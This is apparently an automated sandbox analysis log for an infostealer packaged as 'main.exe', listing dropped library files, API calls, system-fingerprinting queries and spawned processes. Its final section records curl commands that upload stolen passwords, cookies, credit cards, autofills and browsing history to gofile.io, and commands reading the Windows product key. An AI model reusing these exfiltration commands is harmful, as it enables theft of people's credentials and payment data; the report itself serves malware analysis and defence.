Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\markupsafe\_speedups.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_cbc.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_RIPEMD160.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_MD4.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Pythonwin\win32ui.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_BLAKE2s.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_BLAKE2b.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\MarkupSafe-3.0.2.dist-info\LICENSE.txtJump to behavior
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA44C40 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF6ABA44C40
Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_asyncio.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\win32\_win32sysloader.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_MD5.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_bz2.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_Salsa20.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA256.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_keccak.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_ghash_portable.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\win32com\shell\shell.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\python3.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_hashlib.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_overlapped.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Pythonwin\mfc140u.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\cryptography\hazmat\bindings\_rust.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\win32\win32api.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_imagingcms.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_poly1305.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_uuid.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_ctr.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_imaging.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_MD2.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_socket.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_imagingmath.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\win32\win32trace.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_brotli.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\pywin32_system32\pywintypes311.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\libcrypto-3-x64.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\pyexpat.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_curve448.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\zstandard\_cffi.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Util\_strxor.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA1.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_queue.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA384.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_sqlite3.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_webp.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\ossl-modules\legacy.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_lzma.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_cffi_backend.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Util\_cpuid_c.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_curve25519.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA512.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\select.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_aesni.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_elementtree.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_aes.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA224.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\pywin32_system32\pythoncom311.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\zstandard\backend_c.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_ctypes.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_ocb.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Protocol\_scrypt.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_ssl.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_ecb.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_imagingtk.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_ghash_clmul.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_ofb.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\python311.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Math\_modexp.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\markupsafe\_speedups.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_cbc.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_RIPEMD160.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_MD4.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Pythonwin\win32ui.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_BLAKE2s.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_BLAKE2b.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-18427
Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA48840 FindFirstFileExW,FindClose,0_2_00007FF6ABA48840
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA47800 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6ABA47800
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA62AE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6ABA62AE4
Source: curl.exe, 0000000E.00000002.1844245274.000001EB2E898000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
Source: main.exe, 00000002.00000003.1950132310.000001ED8C1DD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1770547519.000001ED8C1C5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924390284.000001ED8C1DA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1776491892.000001ED8C1C6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1768763930.000001ED8C1C5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1915129551.000001ED8C1DA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1774768079.000001ED8C1C6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1763094156.000001ED8C1C5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1773385102.000001ED8C1C6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1771560505.000001ED8C1C6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1769577531.000001ED8C1C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWj
Source: curl.exe, 00000012.00000002.1848444112.000001AA5BB48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
Source: curl.exe, 00000006.00000002.1837095116.00000149D0428000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
Source: curl.exe, 00000008.00000002.1838633812.0000015BF1EE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
Source: curl.exe, 0000000C.00000002.1841492318.0000028089D59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: curl.exe, 00000010.00000002.1846245734.0000027103518000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllLL
Source: C:\Users\user\Desktop\main.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA4C6FC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6ABA4C6FC
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA646F0 GetProcessHeap,0_2_00007FF6ABA646F0
Source: C:\Users\user\Desktop\main.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\main.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA4C8A0 SetUnhandledExceptionFilter,0_2_00007FF6ABA4C8A0
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA4C6FC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6ABA4C6FC
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA4BE60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6ABA4BE60
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA5B558 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6ABA5B558
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path softwarelicensingservice get OA3xOriginalProductKeyJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
